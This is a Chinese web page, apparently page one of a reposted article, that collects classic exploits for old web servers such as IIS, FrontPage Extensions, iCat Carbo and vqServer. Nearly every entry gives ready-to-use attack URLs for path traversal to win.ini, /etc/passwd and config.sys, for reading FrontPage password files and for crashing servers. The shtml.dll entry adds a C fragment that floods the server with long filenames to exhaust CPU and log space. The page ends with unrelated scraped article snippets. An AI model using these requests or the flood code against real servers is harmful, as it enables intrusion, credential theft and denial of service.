一些收集到的经典漏洞详解第1/2页_漏洞研究

☆carbo.dll☆  

iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞, 

这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).  

攻击方法:  

提交这样的http请求 :  

http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog  

http会做如下回应:  

[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]  

Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'  

查看win.ini文件: c:\winnt\win.ini:  

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog  

___________________________________________________________________________  

☆uploader.exe☆  

如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。  

攻击方法: http://host/cgi-win/uploader.exe  

会带你到上传页面,剩下的事就不用我告诉你了把?:)  

___________________________________________________________________________  

☆search97.vts☆  

这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。  

攻击方法: http://www.xxx.com/search97.vts  

?HLNavigate=On&querytext=dcm  

&ServerKey=Primary  

&ResultTemplate=../../../../../../../etc/passwd  

&ResultStyle=simple  

&ResultCount=20  

&collection=books  

___________________________________________________________________________  

☆newdsn.exe☆  

个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,

利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。  

攻击方法:  

1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=  

2. D.o.s攻击:提交下列连接请求:  

http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  

如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:  

- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。  

- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此, 

如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  

IIS会产生保护性错误。  

___________________________________________________________________________  

☆service.pwd☆  

http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.  

攻击方法:  

访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。  

___________________________________________________________________________  

☆users.pwd☆  

UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。  

攻击方法:  

访问http://www.hostname.com/_vti_pvt/users.pwd。  

___________________________________________________________________________  

☆authors.pwd☆  

UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。  

攻击方法:  

访问http://www.hostname.com/_vti_pvt/authors.pwd。  

___________________________________________________________________________  

☆administrators.pwd☆  

UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。  

攻击方法:  

访问http://www.hostname.com/_vti_pvt/administrators.pwd。  

___________________________________________________________________________  

☆shtml.dll☆  

在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息.

 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. http://TrustedServer如果用户点击

上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客

户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,

shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,

能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。  

攻击方法:  

1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html  

这样将返回以下信息:  

Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.  

2. 可信任站点执行脚本:使用如下格式的URL:  

serv_addr.sin_family =AF_INET;  

serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");  

serv_addr.sin_port = htons(80);  

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)  

{  

printf("Create Socket faild \n");  

return ;  

}  

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)  

{  

printf("Connect faild \n");;  

}  

else  

{  

lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );  

for (lDo = 0 ;lDo < 7000;lDo ++)  

{  

lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;  

if (lLen < 0 )  

{  

printf("Send faild \n");  

return;  

}  

}  

lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;  

//recv(sockfd,buffer,2000,0);  

//printf(buffer);  

//printf("\n");  

}  

closesocket(sockfd);  

}  

___________________________________________________________________________  

☆shtml.exe☆  

微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。

通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。  

攻击方法:  

提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/

prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe

/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_

vti_bin/shtml.exe/com1 .  

___________________________________________________________________________  

☆queryhit.htm☆  

如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。  

攻击方法:  

访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:

[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。  

___________________________________________________________________________  

☆Dotdotdot☆  

vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW

中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击

者绕过WEB安全系统横贯到其他目录。  

攻击方法:  

假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys  

列出根目录。 http://example.com/ /../../../../../../  

___________________________________________________________________________  

☆autoexec.bat☆  

现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来

退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.  

攻击方法: :8080/../../../autoexec.bat 这样将读取畹统中的autoexec.bat文件  

这个漏洞的利用还取决于系统目录的结构而定.  

___________________________________________________________________________  

☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆  

IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,

还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,

这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。

这个目录物理映射在下面的目录下:  

c:\winnt\system32\inetsrv\iisadmpwd  

攻击方法:  

访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。  

当前1/2页 12下一页阅读全文

时间: 2024-09-11 02:31:30

一些收集到的经典漏洞详解第1/2页_漏洞研究的相关文章

ASP.NET表单验证方法详解第1/2页_实用技巧

1.使用验证控件 这属于客户端验证,微软开发人员将最常用的验证功能进行了封装,使得我们开发效率明显提高,而且特别是自定义验证控件,非常灵活,我们可以自行设计验证逻辑.但是验证控件收到了浏览器的限制,记得在一次开发过程中,使用FireFox浏览器进行浏览,发现所有的验证控件失灵,这个并非是ASP.NET设计的漏洞,只能说浏览器标准的不唯一造成的. ASP.NET公有六种验证控件,分别如下: RequiredFieldValidator(必须字段验证) 用于检查是否有输入值 CompareValid

batchcollect pagecollect来自官方杰奇jieqi定时采集配置方法参数详解第1/2页_杰奇cms

前言 要实现采集,默认方式是根据配置好的采集规则,在浏览器提交相应的参数即可完成后面的采集入库全部动作. 而实现定时采集,与人工在浏览器提交有些区别,主要分两大步骤: 一.编写采集的url和相关参数,访问这个url即可实现想要的采集模式.(这个url直接在浏览器提交同样可以实现采集) 二.把定时访问这个url的功能加到系统的定时任务里面,实现无人值守的定时采集. 具体实现方法请参考下面内容: 1.对采集配置文件的解释 任何一个采集都会用到两个采集配置文件(跟后台采集规则配置对应),都可以用文本编

百度分词算法详解第1/2页_网站运营

本文通过搜索结果归纳分析+切词通用算法分析的方式对百度预处理阶段的查询处理和中文分词两项技术进行了阐述.总结,如果你对数据结构.算法有一定了解的话,理解起来会相对容易些:个人感觉,得出正向最大匹配算法不够准确,无论是专用词典还是普通词典里的词,都是有不同权重的,这根搜索频率应该有一定关系,基于这点,在出现多个专用词典里的词时,是需要采用双向最大匹配算法来检测到底哪一个专有词汇应该先被切出来,当然,这是个人猜想,有待考究. 理解分词技术对SEO工作具有极大意义,可以从科学的角度来分析关键词,并构想

史上最牛的WINDOWS系统文件详解第1/3页_应用技巧

我们每天都在使用Windows,可你对它的系统文件熟悉吗?所谓的系统文件一般指的是与Windows有密切关系的,系统正常运作所离不开的文件.这些文件绝大多数位于System32目 录下(X:\Windows\System32\) 以及系统文件备份目录DllCache下(X:\Windows\System32\Dllcache\)("X"是你的XP系统所在的分区)他们一般是以dll文件的形式存在的,其次还有cpl(控制面版)等其他一些格式的文件.  我们所看到的Windows外观的元素(

备份恢复分区表的工具Disk Genius使用详解第1/4页_硬件维护

誉为分区小超人的DISKMAN又推出其第二版Disk Genius,他的功能在原来1.2的基础上,又具有强大的分共维护功能,让我们来看一下其中的功能吧.  现在可供选用的硬盘分区工具软件很多,但基本上都是"外国货",只有被誉为分区小超人的DISKMAN是地地道道的国货.DISKMAN以其操作直观简便的特点为菜鸟级电脑用户所喜爱,但在近两年的时间里,DISKMAN的版本一直停留在V1.2,总不见作者推出升级版本,不免让人为它担心.现在,2.0版本的DISKMAN终于出现了,仍然是免费软件

ASP存储过程开发应用详解第1/2页_存储过程

我在初学时查阅过大量相关资料,发现其中提供的很多方法实际操作起来并不是那么回事.对于简单的应用,这些资料也许是有帮助的,但仅限于此,因为它们根本就是千篇一律,互相抄袭,稍微复杂点的应用,就全都语焉不详了. 现在,我基本上通过调用存储过程访问SQL Server,以下的文字都是实践的总结,希望对大家能有帮助. 存储过程就是作为可执行对象存放在数据库中的一个或多个SQL命令. 定义总是很抽象.存储过程其实就是能完成一定操作的一组SQL语句,只不过这组语句是放在数据库中的(这里我们只谈SQL Serv

一周新闻回顾:万般不舍的微软XP退休 OpenSSL重大漏洞详解

中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅 1. 比特币报价单月跳水近40% 虚拟货币热催生风险 比特币也好,莱特币.元宝币也罢,在国内市场上经过一段时间的狂热炒作后,在监管加强后,价格都出现大幅波动. 虚拟货币热催生风险 据新华社电 曾一年间疯涨80倍的虚拟货币比特币正遭遇尴尬:一方面,交易平台遭遇银行及支付机构"设限",导致比特币行情单月跳水近40%;另一方面,虚拟货币热也催生国内数十种"山寨币",投资均不乏本金难保风险. 相关阅读: 比特币报价单月

JSP安全开发之XSS漏洞详解_java

前言      大家好,好男人就是我,我就是好男人,我就是-0nise.在各大漏洞举报平台,我们时常会看到XSS漏洞.那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复? 正文 1.XSS?XSS?XSS是什么鬼?      XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混.CSS(跨站脚本攻击),CSS(层叠样式表)傻傻分不清.所以就叫XSS咯.

站长网播报:OpenSSL重大漏洞详解 史上最糟糕的浏览器IE6死亡

中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅 1. 详解OpenSSL重大漏洞:谁会受影响?如何解决? 近日有研究人员公布,广为流行的网络加密软件OpenSSL存在名为Heartbleed的重大漏洞,人们的账号密码.信用卡号码等个人信息可能会失窃.各大主流网站都在加紧解决这一问题.究竟是什么回事呢?普通网民是否会受到影响呢?国外媒体近日就这类疑问一一进行了详解. 何为SSL? SSL是一流行的加密技术,可保护网络用户在互联网上传输的隐私信息.例如,访问诸如Gmail.com的安全网站时